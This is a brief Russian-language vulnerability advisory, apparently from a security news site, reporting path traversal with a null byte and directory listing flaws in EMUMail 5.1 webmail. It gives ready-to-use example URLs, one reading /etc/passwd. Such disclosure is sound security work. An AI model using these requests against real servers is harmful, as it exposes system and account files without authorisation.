EMU Webmail - Webmail приложение от EMUMAIL Inc. 

В программе обнаружено две уязвимости: 

1. Чтение произвольных файлов на Webmail системе:

Любой пользователь может читать произвольные файлы добавляя в конец файла %00.

Пример:

http://site/emumail.cgi?type=/../../../../../etc/passwd%00 

2. Просмотр содержания директории:

Пример:

http://site/emumail.cgi?type=.%00 

Уязвимость найдена в EMUMail 5.1.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии